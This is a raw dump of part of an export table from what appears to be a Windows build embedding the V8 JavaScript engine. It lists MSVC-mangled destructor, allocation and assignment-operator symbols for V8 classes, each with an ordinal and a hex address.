                                  ??1CanonicalHandleScope@internal@v8@@QEAA@XZ10940x140963ec0
                                  ??1Channel@V8Inspector@v8_inspector@@UEAA@XZ10950x1400768e0
                                  ??1CheckpointElimination@compiler@internal@v8@@UEAA@XZ10960x1400768e0
                                  ??1ClassScope@internal@v8@@QEAA@XZ10970x1400768e0
                                  ??1CodeAssembler@compiler@internal@v8@@QEAA@XZ10980x1400768e0
                                  ??1CodeAssemblerLabel@compiler@internal@v8@@QEAA@XZ10990x140e69100
                                  ??1CodeAssemblerState@compiler@internal@v8@@QEAA@XZ11000x140e69200
                                  ??1CodeAssemblerVariable@compiler@internal@v8@@QEAA@XZ11010x140e692f0
                                  ??1CodeEventHandler@v8@@UEAA@XZ11020x140a78490
                                  ??1CodeEventLogger@internal@v8@@UEAA@XZ11030x14084a770
                                  ??1CodeGenerator@compiler@internal@v8@@UEAA@XZ11040x14047cf30
                                  ??1CodeMap@internal@v8@@QEAA@XZ11050x1406d46c0
                                  ??1CodeObjectRegistry@internal@v8@@QEAA@XZ11060x14041efd0
                                  ??1CombinedHeapObjectIterator@internal@v8@@QEAA@XZ11070x14060ff10
                                  ??1CommonOperatorReducer@compiler@internal@v8@@UEAA@XZ11080x1400768e0
                                  ??1CompactionSpace@internal@v8@@UEAA@XZ11090x140419d60
                                  ??1CompilationCache@internal@v8@@AEAA@XZ11100x1406a42e0
                                  ??1CompilationDependencies@compiler@internal@v8@@QEAA@XZ11110x1408b18c0
                                  ??1CompilationJob@internal@v8@@UEAA@XZ11120x1400768e0
                                  ??1CompilationResultResolver@wasm@internal@v8@@UEAA@XZ11130x1400768e0
                                  ??1CompiledWasmModule@v8@@QEAA@XZ11140x1400773a0
                                  ??1CompilerDispatcher@internal@v8@@QEAA@XZ11150x1409d53e0
                                  ??1ConcurrentMarking@internal@v8@@QEAA@XZ11160x140419ba0
                                  ??1ConditionVariable@base@v8@@QEAA@XZ11170x1400768e0
                                  ??1ConditionalControlFlowBuilder@interpreter@internal@v8@@UEAA@XZ11180x14086beb0
                                  ??1ConstantArrayBuilder@interpreter@internal@v8@@QEAA@XZ11190x140869fa0
                                  ??1ConstantFoldingReducer@compiler@internal@v8@@UEAA@XZ11200x140f104a0
                                  ??1ContextDeserializer@internal@v8@@UEAA@XZ11210x1406007c0
                                  ??1ContextSerializer@internal@v8@@UEAA@XZ11220x14060ff20
                                  ??1ControlEquivalence@compiler@internal@v8@@QEAA@XZ11230x140448390
                                  ??1ControlFlowBuilder@interpreter@internal@v8@@UEAA@XZ11240x1400768e0
                                  ??1ControlFlowOptimizer@compiler@internal@v8@@QEAA@XZ11250x140e7b220
                                  ??1Counters@V8Inspector@v8_inspector@@QEAA@XZ11260x1404df510
                                  ??1Coverage@debug@v8@@QEAA@XZ11270x1400773a0
                                  ??1CpuFeatureScope@internal@v8@@QEAA@XZ11280x1400768e0
                                  ??1CpuProfileDeoptInfo@v8@@QEAA@XZ11290x140077a50
                                  ??1CpuProfiler@internal@v8@@QEAA@XZ11300x1406e6aa0
                                  ??1CpuProfilesCollection@internal@v8@@QEAA@XZ11310x1406cc480
                                  ??1CpuProfilingOptions@v8@@QEAA@XZ11320x140077c60
                                  ??1CsaLoadElimination@compiler@internal@v8@@UEAA@XZ11330x140e7b250
                                  ??1DateCache@internal@v8@@UEAA@XZ11340x1406762d0
                                  ??1DbgStreamBuf@internal@v8@@UEAA@XZ11350x1405f27c0
                                  ??1DeadCodeElimination@compiler@internal@v8@@UEAA@XZ11360x1400768e0
                                  ??1Debug@internal@v8@@AEAA@XZ11370x1409bdf50
                                  ??1DebugInfo@wasm@internal@v8@@QEAA@XZ11380x140565830
                                  ??1DeclarationScope@internal@v8@@QEAA@XZ11390x1400768e0
                                  ??1DecompressionOptimizer@compiler@internal@v8@@QEAA@XZ11400x140e7b270
                                  ??1DeferredHandleScope@internal@v8@@QEAA@XZ11410x140963f10
                                  ??1DeferredHandles@internal@v8@@QEAA@XZ11420x140a784b0
                                  ??1Delegate@ValueDeserializer@v8@@UEAA@XZ11430x1400768e0
                                  ??1Delegate@ValueSerializer@v8@@UEAA@XZ11440x1400768e0
                                  ??1Deserializer@internal@v8@@UEAA@XZ11450x14060d240
                                  ??1DisallowJavascriptExecutionScope@Isolate@v8@@QEAA@XZ11460x140a78590
                                  ??1DisjointAllocationPool@wasm@internal@v8@@QEAA@XZ11470x14041f040
                                  ??1Domain@API@Schema@protocol@v8_inspector@@UEAA@XZ11480x1403e7f40
                                  ??1EhFrameWriter@internal@v8@@QEAA@XZ11490x140448390
                                  ??1EmbedderGraph@v8@@UEAA@XZ11500x1400768e0
                                  ??1EmbedderHeapTracer@v8@@UEAA@XZ11510x1400768e0
                                  ??1EmbedderStackStateScope@internal@v8@@QEAA@XZ11520x1408cb310
                                  ??1Entry@TypeProfile@debug@v8@@QEAA@XZ11530x14041ef70
                                  ??1ErrorThrower@wasm@internal@v8@@QEAA@XZ11540x14051b5c0
                                  ??1EscapableHandleScope@v8@@QEAA@XZ11550x1400769e0
                                  ??1EscapeAnalysis@compiler@internal@v8@@QEAA@XZ11560x140e7b2c0
                                  ??1EscapeAnalysisReducer@compiler@internal@v8@@UEAA@XZ11570x140e7b3d0
                                  ??1Exported@protocol@v8_inspector@@UEAA@XZ11580x1403e7f40
                                  ??1Extension@v8@@UEAA@XZ11590x140076ce0
                                  ??1ExternalOneByteStringResource@String@v8@@UEAA@XZ11600x1400768e0
                                  ??1ExternalResourceVisitor@v8@@UEAA@XZ11610x1400768e0
                                  ??1ExternalSourceStream@ScriptCompiler@v8@@UEAA@XZ11620x1400768e0
                                  ??1ExternalStringResource@String@v8@@UEAA@XZ11630x1400768e0
                                  ??1ExternalStringResourceBase@String@v8@@UEAA@XZ11640x1400768e0
                                  ??1FeedbackVectorSpec@internal@v8@@QEAA@XZ11650x14041f0a0
                                  ??1FlatStringReader@internal@v8@@UEAA@XZ11660x14041f0c0
                                  ??1FrameSummary@internal@v8@@QEAA@XZ11670x140988990
                                  ??1FreeListFastAlloc@internal@v8@@UEAA@XZ11680x1408cfb70
                                  ??1FreeListLegacy@internal@v8@@UEAA@XZ11690x1408cfb90
                                  ??1FreeListMany@internal@v8@@UEAA@XZ11700x1408cfbb0
                                  ??1FreeListManyCached@internal@v8@@UEAA@XZ11710x14041f0e0
                                  ??1FreeListManyCachedFastPath@internal@v8@@UEAA@XZ11720x14041f0e0
                                  ??1FreeListManyCachedOrigin@internal@v8@@UEAA@XZ11730x14041f0e0
                                  ??1FreeListMap@internal@v8@@UEAA@XZ11740x1408cfbd0
                                  ??1FunctionData@Coverage@debug@v8@@QEAA@XZ11750x14041ef70
                                  ??1GCTracer@internal@v8@@QEAA@XZ11760x1408cb3a0
                                  ??1GlobalHandles@internal@v8@@QEAA@XZ11770x140964960
                                  ??1Graph@compiler@internal@v8@@QEAA@XZ11780x140dffbe0
                                  ??1GraphAssembler@compiler@internal@v8@@UEAA@XZ11790x140ec2620
                                  ??1GraphReducer@compiler@internal@v8@@UEAA@XZ11800x140ea1a70
                                  ??1GraphTrimmer@compiler@internal@v8@@QEAA@XZ11810x140452f90
                                  ??1HandleScope@v8@@QEAA@XZ11820x140a78610
                                  ??1HandlerTableBuilder@interpreter@internal@v8@@QEAA@XZ11830x14041f0a0
                                  ??1HeapObjectIterator@internal@v8@@QEAA@XZ11840x140927ec0
                                  ??1I32PairToBigIntDescriptor@internal@v8@@UEAA@XZ11850x1400768e0
                                  ??1I64ToBigIntDescriptor@internal@v8@@UEAA@XZ11860x1400768e0
                                  ??1IdentityMapBase@internal@v8@@MEAA@XZ11870x1405f2fe0
                                  ??1IncrementalMarking@internal@v8@@QEAA@XZ11880x140419cd0
                                  ??1Inspectable@V8InspectorSession@v8_inspector@@UEAA@XZ11890x1400768e0
                                  ??1InstantiationResultResolver@wasm@internal@v8@@UEAA@XZ11900x1400768e0
                                  ??1InstructionBlock@compiler@internal@v8@@QEAA@XZ11910x140452d60
                                  ??1InstructionSelector@compiler@internal@v8@@QEAA@XZ11920x140457cb0
                                  ??1InstructionSequence@compiler@internal@v8@@QEAA@XZ11930x140452da0
                                  ??1Int64Lowering@compiler@internal@v8@@QEAA@XZ11940x140e4d900
                                  ??1Int64LoweringSpecialCase@compiler@internal@v8@@QEAA@XZ11950x140419d50
                                  ??1InterpreterDispatchDescriptor@internal@v8@@UEAA@XZ11960x1400768e0
                                  ??1InvalidatedSlotsCleanup@internal@v8@@QEAA@XZ11970x14041f0f0
                                  ??1InvalidatedSlotsFilter@internal@v8@@QEAA@XZ11980x14041f100
                                  ??1Isolate@internal@v8@@AEAA@XZ11990x140978900
                                  ??1IsolateAllocator@internal@v8@@QEAA@XZ12000x14089bb60
                                  ??1Item@ItemParallelJob@internal@v8@@UEAA@XZ12010x1400768e0
                                  ??1ItemParallelJob@internal@v8@@QEAA@XZ12020x14091e740
                                  ??1JSCallReducer@compiler@internal@v8@@UEAA@XZ12030x140e7b430
                                  ??1JSContextSpecialization@compiler@internal@v8@@UEAA@XZ12040x1400768e0
                                  ??1JSCreateLowering@compiler@internal@v8@@UEAA@XZ12050x1400768e0
                                  ??1JSGraph@compiler@internal@v8@@QEAA@XZ12060x140e34550
                                  ??1JSGraphAssembler@compiler@internal@v8@@UEAA@XZ12070x140e4d9e0
                                  ??1JSHeapBroker@compiler@internal@v8@@QEAA@XZ12080x140dd7cf0
                                  ??1JSHeapCopyReducer@compiler@internal@v8@@UEAA@XZ12090x1400768e0
                                  ??1JSIntrinsicLowering@compiler@internal@v8@@UEAA@XZ12100x1400768e0
                                  ??1JSNativeContextSpecialization@compiler@internal@v8@@UEAA@XZ12110x1400768e0
                                  ??1JSToWasmWrapperCompilationUnit@wasm@internal@v8@@QEAA@XZ12120x1400f8080
                                  ??1JSTypedLowering@compiler@internal@v8@@UEAA@XZ12130x1400768e0
                                  ??1JumpTableAssembler@wasm@internal@v8@@UEAA@XZ12140x140435f50
                                  ??1LargeObjectSpace@internal@v8@@UEAA@XZ12150x14041f110
                                  ??1LazilyGeneratedNames@wasm@internal@v8@@QEAA@XZ12160x14041f140
                                  ??1LoadElimination@compiler@internal@v8@@UEAA@XZ12170x140452f90
                                  ??1LocalDeclEncoder@wasm@internal@v8@@QEAA@XZ12180x14052cec0
                                  ??1LocalEmbedderHeapTracer@internal@v8@@QEAA@XZ12190x1408cb3b0
                                  ??1LocalHeap@internal@v8@@QEAA@XZ12200x14091cb60
                                  ??1LocalSpace@internal@v8@@UEAA@XZ12210x140419d60
                                  ??1Locker@v8@@QEAA@XZ12220x14096bcf0
                                  ??1LoopBuilder@interpreter@internal@v8@@UEAA@XZ12230x14086bf50
                                  ??1LoopInfo@compiler@internal@v8@@QEAA@XZ12240x140448390
                                  ??1MachineGraph@compiler@internal@v8@@QEAA@XZ12250x140e34550
                                  ??1MachineOperatorReducer@compiler@internal@v8@@UEAA@XZ12260x140fa9dd0
                                  ??1MacroAssembler@internal@v8@@UEAA@XZ12270x140435f50
                                  ??1MarkingWorklists@internal@v8@@QEAA@XZ12280x140419ce0
                                  ??1MarkingWorklistsHolder@internal@v8@@QEAA@XZ12290x1408ef470
                                  ??1MeasureMemoryDelegate@internal@v8@@UEAA@XZ12300x1408ed050
                                  ??1MeasureMemoryDelegate@v8@@UEAA@XZ12310x1400768e0
                                  ??1MemoryMappedFile@OS@base@v8@@UEAA@XZ12320x1400768e0
                                  ??1MemoryReducer@internal@v8@@QEAA@XZ12330x14041ef70
                                  ??1MicrotaskQueue@internal@v8@@UEAA@XZ12340x14096f1f0
                                  ??1MicrotaskQueue@v8@@UEAA@XZ12350x1400768e0
                                  ??1MicrotasksScope@v8@@QEAA@XZ12360x140a78650
                                  ??1MoveOptimizer@compiler@internal@v8@@QEAA@XZ12370x140e7b440
                                  ??1MultiIsolatePlatform@node@@UEAA@XZ12380x1400768e0
                                  ??1Mutex@base@v8@@QEAA@XZ12390x1400768e0
                                  ??1NameConverter@disasm@@UEAA@XZ12400x1400768e0
                                  ??1NativeContextStats@internal@v8@@QEAA@XZ12410x140419d50
                                  ??1NativeModule@wasm@internal@v8@@QEAA@XZ12420x14056c740
                                  ??1NewSpace@internal@v8@@UEAA@XZ12430x14041f180
                                  ??1NodeOriginTable@compiler@internal@v8@@QEAA@XZ12440x140869fc0
                                  ??1OFStream@internal@v8@@UEAA@XZ12450x140457dd0
                                  ??1OFStreamBase@internal@v8@@UEAA@XZ12460x1400c01f0
                                  ??1ObjectIterator@internal@v8@@UEAA@XZ12470x1400768e0
                                  ??1OffThreadHeap@internal@v8@@QEAA@XZ12480x14041f1e0
                                  ??1OffThreadIsolate@internal@v8@@QEAA@XZ12490x14096eee0
                                  ??1OffThreadLargeObjectSpace@internal@v8@@UEAA@XZ12500x14041f110
                                  ??1OffThreadSpace@internal@v8@@UEAA@XZ12510x140419d60
                                  ??1OptimizedCompilationInfo@internal@v8@@QEAA@XZ12520x1409dc8c0
                                  ??1OptimizingCompileDispatcher@internal@v8@@QEAA@XZ12530x1409d4500
                                  ??1OutputStream@v8@@UEAA@XZ12540x1400768e0
                                  ??1PageAllocator@base@v8@@UEAA@XZ12550x1400768e0
                                  ??1PagedSpace@internal@v8@@UEAA@XZ12560x140419d60
                                  ??1PagedSpaceObjectIterator@internal@v8@@UEAA@XZ12570x1400768e0
                                  ??1ParallelMove@compiler@internal@v8@@QEAA@XZ12580x14041f0a0
                                  ??1ParseInfo@internal@v8@@QEAA@XZ12590x140739ac0
                                  ??1Parser@internal@v8@@QEAA@XZ12600x1406f8e10
                                  ??1PauseAllocationObserversScope@internal@v8@@QEAA@XZ12610x1408cfbf0
                                  ??1PersistentHandleVisitor@v8@@UEAA@XZ12620x1400768e0
                                  ??1PersistentHandles@internal@v8@@QEAA@XZ12630x140963800
                                  ??1PhiInstruction@compiler@internal@v8@@QEAA@XZ12640x140452f90
                                  ??1PreparseDataBuilder@internal@v8@@QEAA@XZ12650x1400768e0
                                  ??1ProcessingScope@LocalEmbedderHeapTracer@internal@v8@@QEAA@XZ12660x14095a0b0
                                  ??1ProfileNode@internal@v8@@QEAA@XZ12670x1406cc4c0
                                  ??1ProfileTree@internal@v8@@QEAA@XZ12680x1406d4810
                                  ??1ProfilerCodeObserver@internal@v8@@UEAA@XZ12690x1406cc660
                                  ??1ProfilerEventsProcessor@internal@v8@@UEAA@XZ12700x1406e6d00
                                  ??1ProfilerListener@internal@v8@@UEAA@XZ12710x1406d1350
                                  ??1PropertyDescriptor@v8@@QEAA@XZ12720x140a78690
                                  ??1RawMachineAssembler@compiler@internal@v8@@QEAA@XZ12730x140e69300
                                  ??1RawMachineLabel@compiler@internal@v8@@QEAA@XZ12740x1400768e0
                                  ??1ReadOnlySerializer@internal@v8@@UEAA@XZ12750x14060aa90
                                  ??1RecursiveMutex@base@v8@@QEAA@XZ12760x14026cdc0
                                  ??1Reducer@compiler@internal@v8@@UEAA@XZ12770x1400768e0
                                  ??1RedundancyElimination@compiler@internal@v8@@UEAA@XZ12780x140fb36f0
                                  ??1RegExpBytecodeGenerator@internal@v8@@UEAA@XZ12790x1406c8c00
                                  ??1RegExpMacroAssemblerX64@internal@v8@@UEAA@XZ12800x1404431e0
                                  ??1RegionAllocator@base@v8@@QEAA@XZ12810x140dca7e0
                                  ??1RegisterConfiguration@internal@v8@@UEAA@XZ12820x1400768e0
                                  ??1RemoteObject@API@Runtime@protocol@v8_inspector@@UEAA@XZ12830x1403e7f40
                                  ??1SafeForTerminationScope@Isolate@v8@@QEAA@XZ12840x140a786a0
                                  ??1SafepointScope@internal@v8@@QEAA@XZ12850x1408e2300
                                  ??1Sampler@sampler@v8@@UEAA@XZ12860x140dcb530
                                  ??1SamplingEventsProcessor@internal@v8@@UEAA@XZ12870x1406e6dd0
                                  ??1SaveAndSwitchContext@internal@v8@@QEAA@XZ12880x14041f310
                                  ??1SaveContext@internal@v8@@QEAA@XZ12890x140979120
                                  ??1Scanner@internal@v8@@QEAA@XZ12900x14041f320
                                  ??1Schedule@compiler@internal@v8@@QEAA@XZ12910x140457e60
                                  ??1ScheduledErrorThrower@wasm@internal@v8@@QEAA@XZ12920x14051b660
                                  ??1Scheduler@compiler@internal@v8@@QEAA@XZ12930x140e7b6b0
                                  ??1Scope@Isolate@v8@@QEAA@XZ12940x140076e80
                                  ??1Scope@internal@v8@@QEAA@XZ12950x1400768e0
                                  ??1ScopeIterator@debug@v8@@UEAA@XZ12960x1400768e0
                                  ??1ScopedExceptionHandler@compiler@internal@v8@@QEAA@XZ12970x140e69320
                                  ??1ScriptData@Coverage@debug@v8@@QEAA@XZ12980x14041ef70
                                  ??1ScriptData@TypeProfile@debug@v8@@QEAA@XZ12990x14041ef70
                                  ??1ScriptData@internal@v8@@QEAA@XZ13000x140519a30
                                  ??1SealHandleScope@v8@@QEAA@XZ13010x140a786b0
                                  ??1SearchMatch@API@Debugger@protocol@v8_inspector@@UEAA@XZ13020x1403e7f40
                                  ??1Semaphore@base@v8@@QEAA@XZ13030x140dc89c0
                                  ??1SetupIsolateDelegate@internal@v8@@UEAA@XZ13040x1400768e0
                                  ??1SharedMutex@base@v8@@QEAA@XZ13050x1400768e0
                                  ??1SignatureMap@wasm@internal@v8@@QEAA@XZ13060x14041f3b0
                                  ??1SimplifiedOperatorReducer@compiler@internal@v8@@UEAA@XZ13070x140fdb5c0
                                  ??1SnapshotCreator@v8@@QEAA@XZ13080x140a786d0
                                  ??1SnapshotData@internal@v8@@UEAA@XZ13090x140519a40
                                  ??1SourceIdAssigner@compiler@internal@v8@@QEAA@XZ13100x140e4daa0
                                  ??1SourcePositionTable@compiler@internal@v8@@QEAA@XZ13110x140448390
                                  ??1SourcePositionTable@internal@v8@@QEAA@XZ13120x1406cc670
                                  ??1SourcePositionTableBuilder@internal@v8@@QEAA@XZ13130x14041f3c0
                                  ??1Space@internal@v8@@UEAA@XZ13140x140419da0
                                  ??1SpaceIterator@internal@v8@@UEAA@XZ13150x140927f10
                                  ??1StackTrace@API@Runtime@protocol@v8_inspector@@UEAA@XZ13160x1403e7f40
                                  ??1StackTraceFrameIterator@internal@v8@@QEAA@XZ13170x1400768e0
                                  ??1StackTraceId@API@Runtime@protocol@v8_inspector@@UEAA@XZ13180x1403e7f40
                                  ??1StackTraceIterator@debug@v8@@UEAA@XZ13190x1400768e0
                                  ??1StartupSerializer@internal@v8@@UEAA@XZ13200x1405ff1f0
                                  ??1StateValuesCache@compiler@internal@v8@@QEAA@XZ13210x140dffbe0
                                  ??1StatsCounterThreadSafe@internal@v8@@QEAA@XZ13220x14041f420
                                  ??1StatsScope@ZoneStats@compiler@internal@v8@@QEAA@XZ13230x140fb2710
                                  ??1StreamedSource@ScriptCompiler@v8@@QEAA@XZ13240x140a78760
                                  ??1StreamingDecoder@wasm@internal@v8@@QEAA@XZ13250x140533a90
                                  ??1StreamingProcessor@wasm@internal@v8@@UEAA@XZ13260x1400768e0
                                  ??1StringBuffer@v8_inspector@@UEAA@XZ13270x1400768e0
                                  ??1StringsStorage@internal@v8@@QEAA@XZ13280x1406cd4e0
                                  ??1SuppressMicrotaskExecutionScope@Isolate@v8@@QEAA@XZ13290x140a78790
                                  ??1SwitchBuilder@interpreter@internal@v8@@UEAA@XZ13300x14086bf80
                                  ??1Task@ItemParallelJob@internal@v8@@UEAA@XZ13310x14041efc0
                                  ??1Thread@base@v8@@UEAA@XZ13320x140dc0240
                                  ??1TracedGlobalHandleVisitor@EmbedderHeapTracer@v8@@UEAA@XZ13330x1400768e0
                                  ??1TracedValue@tracing@v8@@UEAA@XZ13340x1405f4f90
                                  ??1TryCatch@v8@@QEAA@XZ13350x140a787b0
                                  ??1TryCatchBuilder@interpreter@internal@v8@@UEAA@XZ13360x14086bfb0
                                  ??1TryFinallyBuilder@interpreter@internal@v8@@UEAA@XZ13370x14086c000
                                  ??1TurboAssembler@internal@v8@@UEAA@XZ13380x140435f50
                                  ??1TurboAssemblerBase@internal@v8@@UEAA@XZ13390x140435f50
                                  ??1TypeCache@compiler@internal@v8@@QEAA@XZ13400x140e8b200
                                  ??1TypeNarrowingReducer@compiler@internal@v8@@UEAA@XZ13410x140fdf360
                                  ??1TypeProfile@debug@v8@@QEAA@XZ13420x1400773a0
                                  ??1TypedOptimization@compiler@internal@v8@@UEAA@XZ13430x140fe0b40
                                  ??1TypedSlotSet@internal@v8@@UEAA@XZ13440x14041f430
                                  ??1TypedSlots@internal@v8@@UEAA@XZ13450x1408d8380
                                  ??1Typer@compiler@internal@v8@@QEAA@XZ13460x140fe4ab0
                                  ??1Unlocker@v8@@QEAA@XZ13470x14096bde0
                                  ??1UnoptimizedCompilationInfo@internal@v8@@QEAA@XZ13480x140869fc0
                                  ??1UnoptimizedCompileState@internal@v8@@QEAA@XZ13490x14041f440
                                  ??1Utf8Value@String@v8@@QEAA@XZ13500x140a78910
                                  ??1V8HeapExplorer@internal@v8@@UEAA@XZ13510x1406da230
                                  ??1V8Inspector@v8_inspector@@UEAA@XZ13520x1400768e0
                                  ??1V8InspectorClient@v8_inspector@@UEAA@XZ13530x1400768e0
                                  ??1V8InspectorSession@v8_inspector@@UEAA@XZ13540x1400768e0
                                  ??1V8StackTrace@v8_inspector@@UEAA@XZ13550x1400768e0
                                  ??1Value@String@v8@@QEAA@XZ13560x140a78910
                                  ??1ValueDeserializer@v8@@QEAA@XZ13570x140a78920
                                  ??1ValueNumberingReducer@compiler@internal@v8@@UEAA@XZ13580x140fec730
                                  ??1ValueSerializer@v8@@QEAA@XZ13590x140a78950
                                  ??1VirtualMemory@internal@v8@@QEAA@XZ13600x1405f3d30
                                  ??1VoidDescriptor@internal@v8@@UEAA@XZ13610x1400768e0
                                  ??1WasmCode@wasm@internal@v8@@QEAA@XZ13620x14056c9a0
                                  ??1WasmCodeManager@wasm@internal@v8@@QEAA@XZ13630x14041f4d0
                                  ??1WasmCodeRefScope@wasm@internal@v8@@QEAA@XZ13640x14056cb70
                                  ??1WasmEngine@wasm@internal@v8@@QEAA@XZ13650x14055caa0
                                  ??1WasmError@wasm@internal@v8@@QEAA@XZ13660x1403e9a80
                                  ??1WasmFunctionBuilder@wasm@internal@v8@@QEAA@XZ13670x14052cee0
                                  ??1WasmGraphBuilder@compiler@internal@v8@@QEAA@XZ13680x140e4db50
                                  ??1WasmInterpreter@wasm@internal@v8@@QEAA@XZ13690x140542250
                                  ??1WasmModule@wasm@internal@v8@@QEAA@XZ13700x14041f540
                                  ??1WasmModuleBuilder@wasm@internal@v8@@QEAA@XZ13710x14052cf90
                                  ??1WasmModuleObjectBuilderStreaming@v8@@QEAA@XZ13720x140077420
                                  ??1WasmModuleSourceMap@wasm@internal@v8@@QEAA@XZ13730x14041fad0
                                  ??1WasmSerializer@wasm@internal@v8@@QEAA@XZ13740x140519a60
                                  ??1WasmStreaming@v8@@QEAA@XZ13750x140533c50
                                  ??1Zone@internal@v8@@QEAA@XZ13760x140514fb0
                                  ??1ZoneStats@compiler@internal@v8@@QEAA@XZ13770x140fb2780
                                  ??2ErrorThrower@wasm@internal@v8@@CAPEAX_K@Z13780x14041fbd0
                                  ??2EscapableHandleScope@v8@@CAPEAX_K@Z13790x14041fbd0
                                  ??2HandleScope@v8@@CAPEAX_K@Z13800x14041fbd0
                                  ??2Isolate@internal@v8@@CAPEAX_KPEAX@Z13810x140076870
                                  ??2Malloced@internal@v8@@SAPEAX_K@Z13820x1405f3dc0
                                  ??2Node@compiler@internal@v8@@CAPEAX_KPEAX@Z13830x140076870
                                  ??2Register@interpreter@internal@v8@@CAPEAX_K@Z13840x14041fbd0
                                  ??2SamplingEventsProcessor@internal@v8@@SAPEAX_K@Z13850x1406e6e20
                                  ??2SealHandleScope@v8@@CAPEAX_K@Z13860x14041fbd0
                                  ??2TryCatch@v8@@CAPEAX_K@Z13870x14041fbd0
                                  ??3BackingStore@v8@@SAXPEAX@Z13880x140076bf0
                                  ??3ErrorThrower@wasm@internal@v8@@CAXPEAX_K@Z13890x14041fbd0
                                  ??3EscapableHandleScope@v8@@CAXPEAX_K@Z13900x14041fbd0
                                  ??3HandleScope@v8@@CAXPEAX_K@Z13910x14041fbd0
                                  ??3Malloced@internal@v8@@SAXPEAX@Z13920x1401d3f90
                                  ??3Register@interpreter@internal@v8@@CAXPEAX_K@Z13930x14041fbd0
                                  ??3SamplingEventsProcessor@internal@v8@@SAXPEAX@Z13940x1406e6e30
                                  ??3SealHandleScope@v8@@CAXPEAX_K@Z13950x14041fbd0
                                  ??3TryCatch@v8@@CAXPEAX_K@Z13960x14041fbd0
                                  ??4?$BaseNameDictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z13970x140076a30
                                  ??4?$BaseNameDictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z13980x140076a30
                                  ??4?$BaseNameDictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z13990x140076a30
                                  ??4?$BaseNameDictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z14000x140076a30
                                  ??4?$BaseShape@I@internal@v8@@QEAAAEAV012@$$QEAV012@@Z14010x1400769f0
                                  ??4?$BaseShape@I@internal@v8@@QEAAAEAV012@AEBV012@@Z14020x1400769f0
                                  ??4?$BaseShape@PEAVHashTableKey@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z14030x1400769f0
                                  ??4?$BaseShape@PEAVHashTableKey@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z14040x1400769f0
                                  ??4?$BaseShape@PEAVStringTableKey@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z14050x1400769f0
                                  ??4?$BaseShape@PEAVStringTableKey@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z14060x1400769f0
                                  ??4?$BaseShape@V?$Handle@VName@internal@v8@@@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z14070x1400769f0
                                  ??4?$BaseShape@V?$Handle@VName@internal@v8@@@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z14080x1400769f0
                                  ??4?$BaseShape@V?$Handle@VObject@internal@v8@@@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z14090x1400769f0
                                  ??4?$BaseShape@V?$Handle@VObject@internal@v8@@@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z14100x1400769f0
                                  ??4?$BaseShape@VString@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z14110x1400769f0
                                  ??4?$BaseShape@VString@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z14120x1400769f0
                                  ??4?$Dictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z14130x140076a30
                                  ??4?$Dictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z14140x140076a30
                                  ??4?$Dictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z14150x140076a30
                                  ??4?$Dictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z14160x140076a30
                                  ??4?$Dictionary@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z14170x140076a30
                                  ??4?$Dictionary@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z14180x140076a30
                                  ??4?$Dictionary@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z14190x140076a30
                                  ??4?$Dictionary@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z14200x140076a30
                                  ??4?$FactoryBase@VFactory@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z14210x1400769f0
                                  ??4?$FactoryBase@VFactory@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z14220x1400769f0
                                  ??4?$FactoryBase@VOffThreadFactory@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z14230x1400769f0
                                  ??4?$FactoryBase@VOffThreadFactory@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z14240x1400769f0
                                  ??4?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z14250x140076a30
                                  ??4?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z14260x140076a30
                                  ??4?$HashTable@VEphemeronHashTable@internal@v8@@VEphemeronHashTableShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z14270x140076a30
                                  ??4?$HashTable@VEphemeronHashTable@internal@v8@@VEphemeronHashTableShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z14280x140076a30
                                  ??4?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z14290x140076a30
                                  ??4?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z14300x140076a30
                                  ??4?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z14310x140076a30
